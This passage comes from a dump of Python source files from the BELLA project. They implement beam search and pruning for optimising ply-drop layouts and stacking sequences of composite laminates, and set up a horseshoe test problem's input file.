tab_angle_queue.append([])\r\n\r\n ### ply drop layout\r\n child_pdl = deepcopy(mother_pdl)\r\n if new_boundary_tab[ind_step]:\r\n child_pdl[ind_panel_tab[ind_step]] = np.copy(\r\n child_pdl[ind_panel_tab[ind_step] + 1])\r\n child_pdl[ind_panel_tab[ind_step]][one_pd_index] = - 1\r\n if constraints.sym:\r\n child_pdl[ind_panel_tab[ind_step]][\r\n n_plies_max - one_pd_index - 1] = - 1\r\n\r\n ### penalties for the ply-drop layout rule\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=child_pdl,\r\n multipanel=multipanel,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n 
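# keep this child: store its ply-drop layout, the indices of all its\r\n                # ply drops, its spacing penalty and the angle queue used to\r\n                # restore balance ply by ply\r\n                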
tab_child_pdl.append(child_pdl[:])\r\n tab_penalty_spacing.append(penalty_spacing)\r\n new_list = list(mother_all_pdl_indices)\r\n new_list.append(one_pd_index)\r\n tab_all_pdl_indices.append(new_list)\r\n tab_last_pdl_index.append(one_pd_index)\r\n\r\n# print('child_pdl', child_pdl)\r\n\r\n ### local pruning for the ply-drop layout rules\r\n indices_to_keep = []\r\n tab_penalty_spacing_for_pruning = np.copy(tab_penalty_spacing)\r\n if len(tab_penalty_spacing_for_pruning) \\\r\n > parameters.local_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.local_node_limit2:\r\n\r\n min_value = min(tab_penalty_spacing_for_pruning)\r\n indices_to_add = np.where(\r\n tab_penalty_spacing_for_pruning == min_value)[0]\r\n for elem in indices_to_add:\r\n indices_to_keep.append(elem)\r\n tab_penalty_spacing_for_pruning[elem] = 1000\r\n\r\n indices_to_keep.sort()\r\n# print('indices_to_keep', indices_to_keep)\r\n tab_child_pdl = [tab_child_pdl[index] \\\r\n for index in indices_to_keep]\r\n tab_penalty_spacing = [tab_penalty_spacing[index] \\\r\n for index in indices_to_keep]\r\n tab_angle_queue = [tab_angle_queue[index] \\\r\n for index in indices_to_keep]\r\n tab_last_pdl_index = [tab_last_pdl_index[index] \\\r\n for index in indices_to_keep]\r\n tab_all_pdl_indices = [tab_all_pdl_indices[index] \\\r\n for index in indices_to_keep]\r\n\r\n ### calculations of lay-up penalties and multi-panel objective\r\n # function values\r\n tab_child_n_plies_per_angle = []\r\n tab_child_lampam = []\r\n # tab_child_penalty_oopo = []\r\n tab_child_penalty_diso = []\r\n # tab_child_penalty_contig = []\r\n tab_child_obj_no_constraints = []\r\n tab_child_obj_constraints = []\r\n # tab_child_penalty_10 = []\r\n\r\n for ind_pd in range(len(tab_child_pdl))[::-1]:\r\n ### calculation of the stacking sequence in the currently\r\n # optimised panel\r\n child_ss = np.copy(tab_child_pdl[\r\n ind_pd][ind_panel_tab[ind_step]])\r\n child_ss = child_ss[child_ss != -1]\r\n# print('child_ss', child_ss.size)\r\n# print_ss(child_ss[:child_ss.size // 2], 30)\r\n\r\n ### calculation of the number of plies in each direction\r\n # ~ child_n_plies_per_angle = np.copy(mother_n_plies_per_angle)\r\n child_n_plies_per_angle = deepcopy(mother_n_plies_per_angle)\r\n if new_boundary_tab[ind_step]:\r\n child_n_plies_per_angle[ind_panel_tab[ind_step]] = np.copy(\r\n child_n_plies_per_angle[ind_panel_tab[ind_step] + 1])\r\n index_pd = tab_last_pdl_index[ind_pd]\r\n my_angle = pdl_ref[index_pd]\r\n index = constraints.ind_angles_dict[my_angle]\r\n\r\n child_n_plies_per_angle[ind_panel_tab[ind_step]][index] -= 1\r\n if constraints.sym and n_plies_max - index_pd - 1 != index_pd:\r\n child_n_plies_per_angle[\r\n ind_panel_tab[ind_step]][index] -= 1\r\n\r\n# print('tab_all_pdl_indices', tab_all_pdl_indices[ind_pd])\r\n# print('index_pd', index_pd, 'my_angle', my_angle)\r\n# print('child_n_plies_per_angle')\r\n# print(child_n_plies_per_angle)\r\n\r\n ### calculation of penalties for the disorientation constraint\r\n if constraints.diso:\r\n penalty_diso = calc_n_penalty_diso_ss(\r\n child_ss, constraints)\r\n else:\r\n penalty_diso = 0\r\n child_penalty_diso = deepcopy(mother_penalty_diso)\r\n child_penalty_diso[ind_panel_tab[ind_step]] = penalty_diso\r\n# print('child_penalty_diso', child_penalty_diso)\r\n\r\n ### calculation of penalties for the contiguity constraint\r\n if constraints.contig:\r\n penalty_contig = calc_penalty_contig_ss(\r\n child_ss, constraints)\r\n # pruning for contiguity\r\n if penalty_contig != 0:\r\n # print('contig')\r\n 
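# contiguity violated: discard this child and all of its bookkeeping\r\n                        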
del tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_all_pdl_indices[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_contig = 0\r\n # child_penalty_contig = deepcopy(mother_penalty_contig)\r\n # child_penalty_contig[ind_panel_tab[ind_step]] = penalty_contig\r\n# print('child_penalty_contig', child_penalty_contig)\r\n\r\n ### calculation of lamination parameters\r\n child_lampam = deepcopy(mother_lampam)\r\n child_lampam[ind_panel_tab[ind_step]] \\\r\n = calc_lampam(child_ss, constraints)\r\n# print('child_lampam', child_lampam)\r\n\r\n ### 10% rule\r\n if constraints.rule_10_percent:\r\n if constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(\r\n child_ss,\r\n constraints,\r\n LPs=child_lampam[ind_panel_tab[ind_step]],\r\n mp=False)\r\n else:\r\n penalty_10 = calc_penalty_10_pc(\r\n child_n_plies_per_angle[ind_panel_tab[ind_step]],\r\n constraints)\r\n # pruning 10% rule\r\n if penalty_10 != 0:\r\n # print('10')\r\n del tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_all_pdl_indices[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_10 = 0\r\n # child_penalty_10 = deepcopy(mother_penalty_10)\r\n # child_penalty_10[ind_panel_tab[ind_step]] = penalty_10\r\n# print('child_penalty_10', child_penalty_10)\r\n\r\n ### calculation of objective function values\r\n obj_no_constraints = calc_obj_one_panel(\r\n lampam=child_lampam[ind_panel_tab[ind_step]],\r\n lampam_target=multipanel.reduced.panels[\r\n ind_panel_tab[ind_step]].lampam_target,\r\n lampam_weightings=multipanel.reduced.panels[\r\n ind_panel_tab[ind_step]].lampam_weightings)\r\n child_obj_no_constraints = deepcopy(mother_obj_no_constraints)\r\n child_obj_no_constraints[\r\n ind_panel_tab[ind_step]] = obj_no_constraints\r\n# print('child_obj_no_constraints', child_obj_no_constraints)\r\n\r\n child_obj_constraints = calc_obj_multi_panel(\r\n objective=child_obj_no_constraints,\r\n actual_panel_weightings=multipanel.reduced.actual_panel_weightings,\r\n penalty_diso=child_penalty_diso,\r\n penalty_contig=None,\r\n penalty_oopo=None,\r\n penalty_10=None,\r\n penalty_bal_ipo=None,\r\n penalty_weight=None,\r\n with_Nones=True)\r\n# print('child_obj_constraints', child_obj_constraints)\r\n\r\n ### saving\r\n tab_child_n_plies_per_angle.append(child_n_plies_per_angle)\r\n tab_child_lampam.append(child_lampam)\r\n # tab_child_penalty_oopo.append(child_penalty_oopo)\r\n tab_child_penalty_diso.append(child_penalty_diso)\r\n # tab_child_penalty_contig.append(child_penalty_contig)\r\n # tab_child_penalty_10.append(child_penalty_10)\r\n tab_child_obj_no_constraints.append(child_obj_no_constraints)\r\n tab_child_obj_constraints.append(child_obj_constraints)\r\n\r\n n_obj_func_calls += 1\r\n n_tab_nodes += 1\r\n\r\n\r\n ### local pruning for the other guidelines and stiffness optimality\r\n indices_to_keep = []\r\n tab_child_obj_constraints_for_pruning \\\r\n = np.copy(tab_child_obj_constraints)\r\n if ind_step != n_steps - 1 \\\r\n and len(tab_child_obj_constraints_for_pruning) \\\r\n > parameters.local_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.local_node_limit2:\r\n\r\n min_value = min(tab_child_obj_constraints_for_pruning)\r\n index_to_add = np.where(\r\n tab_child_obj_constraints_for_pruning == min_value)[0][0]\r\n indices_to_keep.append(index_to_add)\r\n tab_child_obj_constraints_for_pruning[index_to_add] = 1000\r\n\r\n indices_to_keep.sort()\r\n# 
print('indices_to_keep', indices_to_keep)\r\n tab_child_pdl = [tab_child_pdl[index] \\\r\n for index in indices_to_keep]\r\n tab_all_pdl_indices = [tab_all_pdl_indices[index] \\\r\n for index in indices_to_keep]\r\n tab_last_pdl_index = [tab_last_pdl_index[index] \\\r\n for index in indices_to_keep]\r\n tab_penalty_spacing = [tab_penalty_spacing[index] \\\r\n for index in indices_to_keep]\r\n tab_angle_queue = [tab_angle_queue[index] \\\r\n for index in indices_to_keep]\r\n tab_child_n_plies_per_angle = [\r\n tab_child_n_plies_per_angle[index] \\\r\n for index in indices_to_keep]\r\n tab_child_lampam = [tab_child_lampam[index] \\\r\n for index in indices_to_keep]\r\n # tab_child_penalty_oopo = [tab_child_penalty_oopo[index] \\\r\n # for index in indices_to_keep]\r\n tab_child_penalty_diso = [tab_child_penalty_diso[index] \\\r\n for index in indices_to_keep]\r\n # tab_child_penalty_contig = [tab_child_penalty_contig[index] \\\r\n # for index in indices_to_keep]\r\n # tab_child_penalty_10 = [tab_child_penalty_10[index] \\\r\n # for index in indices_to_keep]\r\n tab_child_obj_no_constraints = [\r\n tab_child_obj_no_constraints[index] \\\r\n for index in indices_to_keep]\r\n tab_child_obj_constraints = [\r\n tab_child_obj_constraints[index] \\\r\n for index in indices_to_keep]\r\n\r\n\r\n ### save local solutions as global solutions\r\n for ind in range(len(tab_child_obj_constraints)):\r\n\r\n pdls_tab.append(tab_child_pdl[ind])\r\n all_pdl_indices_tab.append(tab_all_pdl_indices[ind])\r\n last_pdl_index_tab.append(tab_last_pdl_index[ind])\r\n penalty_spacing_tab.append(tab_penalty_spacing[ind])\r\n angle_queue_tab.append(tab_angle_queue[ind])\r\n n_plies_per_angle_tab.append(tab_child_n_plies_per_angle[ind])\r\n lampam_tab.append(tab_child_lampam[ind])\r\n penalty_diso_tab.append(tab_child_penalty_diso[ind])\r\n # penalty_contig_tab.append(tab_child_penalty_contig[ind])\r\n # penalty_oopo_tab.append(tab_child_penalty_oopo[ind])\r\n # penalty_10_tab.append(tab_child_penalty_10[ind])\r\n obj_constraints_tab = np.hstack((\r\n obj_constraints_tab, tab_child_obj_constraints[ind]))\r\n obj_no_constraints_tab.append(\r\n tab_child_obj_no_constraints[ind])\r\n\r\n\r\n ### remove duplicates\r\n to_del = []\r\n for ind_pdl_1 in range(len(pdls_tab)):\r\n for ind_pdl_2 in range(ind_pdl_1 + 1, len(pdls_tab)):\r\n if is_same_pdl(pdls_tab[ind_pdl_1],\r\n pdls_tab[ind_pdl_2],\r\n thick_to_thin=True,\r\n ind_ref=multipanel.reduced.ind_ref):\r\n to_del.append(ind_pdl_1)\r\n break\r\n to_del.sort(reverse=True)\r\n for ind_to_del in to_del:\r\n del pdls_tab[ind_to_del]\r\n del all_pdl_indices_tab[ind_to_del]\r\n del last_pdl_index_tab[ind_to_del]\r\n del penalty_spacing_tab[ind_to_del]\r\n del angle_queue_tab[ind_to_del]\r\n del n_plies_per_angle_tab[ind_to_del]\r\n del lampam_tab[ind_to_del]\r\n del penalty_diso_tab[ind_to_del]\r\n # del penalty_contig_tab[ind_to_del]\r\n # del penalty_oopo_tab[ind_to_del]\r\n # del penalty_10_tab[ind_to_del]\r\n del obj_no_constraints_tab[ind_to_del]\r\n obj_constraints_tab = np.delete(obj_constraints_tab,\r\n np.s_[ind_to_del])\r\n\r\n\r\n #### global pruning for ply-drop layout rules\r\n indices_to_keep = []\r\n penalty_spacing_tab_for_pruning = np.copy(penalty_spacing_tab)\r\n\r\n if ind_step != n_steps - 1 \\\r\n and len(penalty_spacing_tab_for_pruning) \\\r\n > parameters.global_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.global_node_limit2:\r\n\r\n min_value = min(penalty_spacing_tab_for_pruning)\r\n indices_to_add = np.where(\r\n 
penalty_spacing_tab_for_pruning == min_value)[0]\r\n for elem in indices_to_add:\r\n indices_to_keep.append(elem)\r\n penalty_spacing_tab_for_pruning[elem] = 1000\r\n\r\n indices_to_keep.sort()\r\n pdls_tab = [pdls_tab[index] for index in indices_to_keep]\r\n all_pdl_indices_tab = [all_pdl_indices_tab[index] \\\r\n for index in indices_to_keep]\r\n last_pdl_index_tab = [last_pdl_index_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_spacing_tab = [penalty_spacing_tab[index] \\\r\n for index in indices_to_keep]\r\n angle_queue_tab = [angle_queue_tab[index] \\\r\n for index in indices_to_keep]\r\n n_plies_per_angle_tab = [n_plies_per_angle_tab[index] \\\r\n for index in indices_to_keep]\r\n lampam_tab = [lampam_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_diso_tab = [penalty_diso_tab[index] \\\r\n for index in indices_to_keep]\r\n # penalty_contig_tab = [penalty_contig_tab[index] \\\r\n # for index in indices_to_keep]\r\n # penalty_oopo_tab = [penalty_oopo_tab[index] \\\r\n # for index in indices_to_keep]\r\n # penalty_10_tab = [penalty_10_tab[index] \\\r\n # for index in indices_to_keep]\r\n obj_constraints_tab = [obj_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n obj_no_constraints_tab = [obj_no_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n\r\n# print('len(obj_constraints_tab) before global pruning stiffness',\r\n# len(obj_constraints_tab))\r\n\r\n #### global pruning for the other guidelines and stiffness optimality\r\n indices_to_keep = []\r\n tab_child_obj_constraints_for_pruning \\\r\n = np.copy(obj_constraints_tab)\r\n\r\n if ind_step != n_steps - 1 \\\r\n and len(tab_child_obj_constraints_for_pruning) \\\r\n > parameters.global_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.global_node_limit2:\r\n\r\n min_value = min(tab_child_obj_constraints_for_pruning)\r\n index_to_add = np.where(\r\n tab_child_obj_constraints_for_pruning == min_value)[0][0]\r\n indices_to_keep.append(index_to_add)\r\n tab_child_obj_constraints_for_pruning[index_to_add] = 1000\r\n\r\n indices_to_keep.sort()\r\n pdls_tab = [pdls_tab[index] for index in indices_to_keep]\r\n all_pdl_indices_tab = [all_pdl_indices_tab[index] \\\r\n for index in indices_to_keep]\r\n last_pdl_index_tab = [last_pdl_index_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_spacing_tab = [penalty_spacing_tab[index] \\\r\n for index in indices_to_keep]\r\n angle_queue_tab = [angle_queue_tab[index] \\\r\n for index in indices_to_keep]\r\n n_plies_per_angle_tab = [n_plies_per_angle_tab[index] \\\r\n for index in indices_to_keep]\r\n lampam_tab = [lampam_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_diso_tab = [penalty_diso_tab[index] \\\r\n for index in indices_to_keep]\r\n # penalty_contig_tab = [penalty_contig_tab[index] \\\r\n # for index in indices_to_keep]\r\n # penalty_oopo_tab = [penalty_oopo_tab[index] \\\r\n # for index in indices_to_keep]\r\n # penalty_10_tab = [penalty_10_tab[index] \\\r\n # for index in indices_to_keep]\r\n obj_constraints_tab = [obj_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n obj_no_constraints_tab = [obj_no_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n\r\n# print('len(obj_constraints_tab) after global pruning',\r\n# len(obj_constraints_tab))\r\n\r\n if len(obj_constraints_tab) == 0:\r\n return False, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n # select best repaired solution\r\n index = np.argmin(obj_constraints_tab)\r\n\r\n for ind_panel in 
range(multipanel.reduced.ind_ref):\r\n        reduced_sst_panel = pdls_tab[index][ind_panel]\r\n        reduced_sst[ind_panel] = reduced_sst_panel\r\n        reduced_lampam[ind_panel] = lampam_tab[index][ind_panel]\r\n        reduced_ss[ind_panel] = reduced_sst_panel[reduced_sst_panel != -1]\r\n\r\n    ## check for symmetry\r\n    if constraints.sym:\r\n        for elem in reduced_ss[0: multipanel.reduced.ind_ref]:\r\n            for ind in range(elem.size // 2):\r\n                if elem[ind] != elem[- ind - 1]:\r\n                    raise Exception('reduced_ss not symmetric')\r\n        for elem in reduced_sst[0: multipanel.reduced.ind_ref]:\r\n            for ind in range(n_plies_max // 2):\r\n                if elem[ind] != elem[- ind - 1]:\r\n                    raise Exception('reduced_sst not symmetric')\r\n\r\n    ## test for the partial lamination parameters\r\n    reduced_lampam_test = calc_lampam(\r\n        reduced_ss[0: multipanel.reduced.ind_ref], constraints)\r\n    if not (abs(reduced_lampam[0: multipanel.reduced.ind_ref]\r\n                - reduced_lampam_test) < 1e-13).all():\r\n        raise Exception(\"\"\"\r\nbeam search does not return group lamination parameters matching\r\nthe group stacking sequences.\"\"\")\r\n\r\n    ## test for the ply counts\r\n    for ind_panel in range(multipanel.reduced.ind_ref):\r\n        if reduced_ss[ind_panel].size \\\r\n                != multipanel.reduced.n_plies_in_panels[ind_panel]:\r\n            raise Exception(\"\"\"\r\nWrong ply counts in the laminate. This should not happen.\"\"\")\r\n\r\n    return True, reduced_sst, reduced_lampam, reduced_ss\r\n"
},
{
"alpha_fraction": 0.4368756413459778,
"alphanum_fraction": 0.4466930627822876,
"avg_line_length": 42.15209197998047,
"blob_id": "60ddab3bc8a80bb646f4de05e336126c27361232",
"content_id": "f2faa7831ea8371452b6317575f0c00963fd9de8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11612,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 263,
"path": "/src/LAYLA_V02/pruning.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nPruning during the beam search\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.guidelines.external_contig import external_contig\r\nfrom src.guidelines.internal_contig import internal_contig2\r\nfrom src.guidelines.disorientation import is_diso\r\n\r\ndef pruning_diso_contig_damtol(\r\n child_ss,\r\n mother_ss_bot,\r\n ss_bot_simp,\r\n level,\r\n constraints,\r\n targets,\r\n mother_ss_top=None,\r\n ss_top_simp=None):\r\n '''\r\n performs the pruning for disorientation, damage tolerance, contiguity and\r\n middle ply symmetry design guidelines during beam search\r\n\r\n INPUTS\r\n\r\n - level: level of the ply determination in the complete lay-up search tree\r\n - child_ss: possible fibre angles for new level\r\n - ss_bot_simp: partial lay-up before the ply group being optimised\r\n - ss_top_simp: partial lay-up after the ply group being optimised\r\n - mother_ss_bot: beginning of the partial lay-up of the ply group being\r\n optimised\r\n - mother_ss_bot: end of the partial lay-up of the ply group being optimised\r\n - constraints: lay-up design guidelines\r\n - targets.n_plies: laminate target ply counts\r\n '''\r\n# =============================================================================\r\n# pruning for middle ply symmetry\r\n# =============================================================================\r\n if constraints.sym and targets.n_plies % 2 \\\r\n and level == targets.n_plies // 2:\r\n child_ss = np.array([0, 90], int)\r\n# =============================================================================\r\n# pruning for damage tolerance\r\n# =============================================================================\r\n my_set = set([45, -45])\r\n\r\n if constraints.dam_tol:\r\n\r\n if level == 0:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n elif not constraints.sym and level == targets.n_plies - 1:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n if constraints.dam_tol_rule in [2, 3]:\r\n\r\n if level == 1:\r\n\r\n if constraints.dam_tol_rule == 2:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] != - mother_ss_bot[0]:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n elif constraints.dam_tol_rule == 3:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n continue\r\n # diso\r\n if constraints.diso \\\r\n and not is_diso(-45, 45, constraints.delta_angle):\r\n if child_ss[ind] != - mother_ss_bot[0]:\r\n child_ss = np.delete(\r\n child_ss, np.s_[ind], axis=0)\r\n\r\n if child_ss.size == 0:\r\n return None\r\n return child_ss\r\n\r\n if level == targets.n_plies - 2 and not constraints.sym:\r\n\r\n if constraints.dam_tol_rule == 2:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] != - mother_ss_top[-1]:\r\n child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n elif constraints.dam_tol_rule == 3:\r\n for ind in range(child_ss.size)[:: -1]:\r\n if child_ss[ind] not in my_set:\r\n child_ss = 
np.delete(child_ss, np.s_[ind], axis=0)\r\n                            continue\r\n                        # diso\r\n                        if constraints.diso \\\r\n                        and not is_diso(-45, 45, constraints.delta_angle):\r\n                            if child_ss[ind] != - mother_ss_top[-1]:\r\n                                child_ss = np.delete(\r\n                                    child_ss, np.s_[ind], axis=0)\r\n\r\n                if child_ss.size == 0:\r\n                    return None\r\n                return child_ss\r\n\r\n# =============================================================================\r\n#     pruning for disorientation\r\n# =============================================================================\r\n    if constraints.diso:\r\n        if constraints.sym or level % 2: # plies at the laminate bottom part\r\n            # externally with ss_bot_simp\r\n            if ss_bot_simp.size > 0 and mother_ss_bot.size == 0:\r\n                for ind in range(child_ss.size)[:: -1]:\r\n                    if not is_diso(child_ss[ind], ss_bot_simp[-1],\r\n                                   constraints.delta_angle):\r\n                        child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n            # internally\r\n            elif mother_ss_bot.size > 0:\r\n                for ind in range(child_ss.size)[:: -1]:\r\n                    if not is_diso(child_ss[ind], mother_ss_bot[-1],\r\n                                   constraints.delta_angle):\r\n                        child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n        else: # asymmetric laminate top part\r\n            # externally with ss_top_simp\r\n            if ss_top_simp.size > 0 and mother_ss_top.size == 0:\r\n                for ind in range(child_ss.size)[:: -1]:\r\n                    if not is_diso(child_ss[ind], ss_top_simp[0],\r\n                                   constraints.delta_angle):\r\n                        child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n            # internally\r\n            if mother_ss_top.size > 0:\r\n                for ind in range(child_ss.size)[:: -1]:\r\n                    if not is_diso(child_ss[ind], mother_ss_top[0],\r\n                                   constraints.delta_angle):\r\n                        child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n        if not constraints.sym and level == targets.n_plies - 1:\r\n            # last ply asymmetric laminates\r\n            if not level % 2: # check compatibility with laminate bottom part\r\n                for ind in range(child_ss.size)[:: -1]:\r\n                    if not is_diso(child_ss[ind], mother_ss_bot[-1],\r\n                                   constraints.delta_angle):\r\n                        child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n            else: # check compatibility with laminate top part\r\n                for ind in range(child_ss.size)[:: -1]:\r\n                    if not is_diso(child_ss[ind], mother_ss_top[0],\r\n                                   constraints.delta_angle):\r\n                        child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n        if child_ss.size == 0:\r\n            return None\r\n# =============================================================================\r\n#     pruning for the contiguity constraint\r\n# =============================================================================\r\n    if constraints.contig:\r\n\r\n        # laminate bottom part but not last ply\r\n        if (constraints.sym \\\r\n            and not level == targets.n_plies // 2 + targets.n_plies % 2 - 1)\\\r\n        or (not constraints.sym and not level == targets.n_plies - 1):\r\n\r\n            for ind in range(child_ss.size)[:: -1]:\r\n                # externally with ss_bot_simp\r\n                test, _ = external_contig(\r\n                    angle=np.array((child_ss[ind],)),\r\n                    n_plies_group=1,\r\n                    constraints=constraints,\r\n                    ss_before=np.hstack((ss_bot_simp, mother_ss_bot)))\r\n                if test.size == 0:\r\n                    child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n                    continue\r\n\r\n        # plies at the laminate top part but not last ply\r\n        elif not constraints.sym and not level % 2 \\\r\n        and not level == targets.n_plies - 1:\r\n\r\n            for ind in range(child_ss.size)[:: -1]:\r\n\r\n                # externally with ss_top_simp\r\n                test, _ = external_contig(\r\n                    angle=np.array((child_ss[ind],)),\r\n                    n_plies_group=1,\r\n                    constraints=constraints,\r\n                    ss_before=np.flip(\r\n                        np.hstack((mother_ss_top, ss_top_simp)), axis=0))\r\n                if test.size == 
0:\r\n                    child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n                    continue\r\n\r\n        # last ply of symmetric laminate\r\n        elif constraints.sym \\\r\n        and level == targets.n_plies // 2 + targets.n_plies % 2 - 1:\r\n\r\n            ss_before = mother_ss_bot[\r\n                mother_ss_bot.size - constraints.n_contig:]\r\n            if ss_before.size < constraints.n_contig:\r\n                ss_before = np.hstack((\r\n                    ss_bot_simp[ss_bot_simp.size \\\r\n                                - constraints.n_contig + ss_before.size:],\r\n                    ss_before))\r\n\r\n            if targets.n_plies % 2 == 0: # no middle ply\r\n\r\n                for ind in range(child_ss.size)[:: -1]:\r\n                    new_stack = np.hstack((\r\n                        ss_before,\r\n                        child_ss[ind],\r\n                        child_ss[ind],\r\n                        np.flip(ss_before, axis=0)))\r\n                    if not internal_contig2(new_stack, constraints):\r\n                        child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n            else: # a middle ply\r\n                for ind in range(child_ss.size)[:: -1]:\r\n                    new_stack = np.hstack((\r\n                        ss_before,\r\n                        child_ss[ind],\r\n                        np.flip(ss_before, axis=0)))\r\n                    if not internal_contig2(new_stack, constraints):\r\n                        child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n        # last ply of asymmetric laminate\r\n        elif not constraints.sym and level == targets.n_plies - 1:\r\n\r\n            ss_before = mother_ss_bot[\r\n                mother_ss_bot.size - constraints.n_contig:]\r\n            if ss_before.size < constraints.n_contig:\r\n                ss_before = np.hstack((\r\n                    ss_bot_simp[ss_bot_simp.size \\\r\n                                - constraints.n_contig + ss_before.size:],\r\n                    ss_before))\r\n\r\n            ss_after = mother_ss_top[:constraints.n_contig]\r\n            if ss_after.size < constraints.n_contig:\r\n                ss_after = np.hstack((\r\n                    ss_after,\r\n                    ss_top_simp[:constraints.n_contig - ss_after.size:]))\r\n\r\n            for ind in range(child_ss.size)[:: -1]:\r\n                if not internal_contig2(\r\n                        new_stack=np.hstack((\r\n                            ss_before, child_ss[ind], ss_after)),\r\n                        constraints=constraints):\r\n                    child_ss = np.delete(child_ss, np.s_[ind], axis=0)\r\n\r\n        if child_ss.size == 0:\r\n            return None\r\n\r\n    return child_ss\r\n"
},
{
"alpha_fraction": 0.4839400351047516,
"alphanum_fraction": 0.5793055891990662,
"avg_line_length": 36.00581359863281,
"blob_id": "5379aaf41bb40b756d3169825e669fda66b6748d",
"content_id": "c089bd7cb03d757d83e283af9bbf8cf57e394d5f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13076,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 344,
"path": "/input-files/create_input_file_horseshoe.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script saves the input file for the horseshoe problem.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nimport numpy.matlib\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.excel import autofit_column_widths\r\nfrom src.divers.excel import delete_file\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA\r\nfrom src.BELLA.save_set_up import save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\n\r\nfilename = 'input_file_horseshoe.xlsx'\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename)\r\n\r\nn_panels = 18\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n\r\n# constraints_set == 'C0' ->\r\n# - ply-drop spacing rule enforced with a minimum of\r\n# constraints.min_drop plies between ply drops at panel boundaries\r\n# - covering rule enforced by preventing the drop of the\r\n# constraints.n_covering outermost plies on each laminate surface\r\n# - symmetry rule enforced, no other lay-up rules\r\n#\r\n# constraints_set == 'C1' ->\r\n# - ply-drop spacing rule enforced with a minimum of\r\n# constraints.min_drop plies between ply drops at panel boundaries\r\n# - covering enforrced by preventing the drop of the\r\n# constraints.n_covering outermost plies on each laminate surface\r\n# - symmetry rule enforced\r\n# - 10% rule enforced\r\n# if rule_10_Abdalla == True rule applied by restricting LPs instead of\r\n# ply percentages and percent_Abdalla is the percentage limit of the\r\n# rule\r\n# otherwise:\r\n# if combined_45_135 == True the restrictions are:\r\n# - a maximum percentage of constraints.percent_0 0 deg plies\r\n# - a maximum percentage of constraints.percent_90 90 deg plies\r\n# - a maximum percentage of constraints.percent_45_135 +-45 deg plies\r\n# if combined_45_135 == False the restrictions are:\r\n# - a maximum percentage of constraints.percent_0 0 deg plies\r\n# - a maximum percentage of constraints.percent_90 90 deg plies\r\n# - a maximum percentage of constraints.percent_45 45 deg 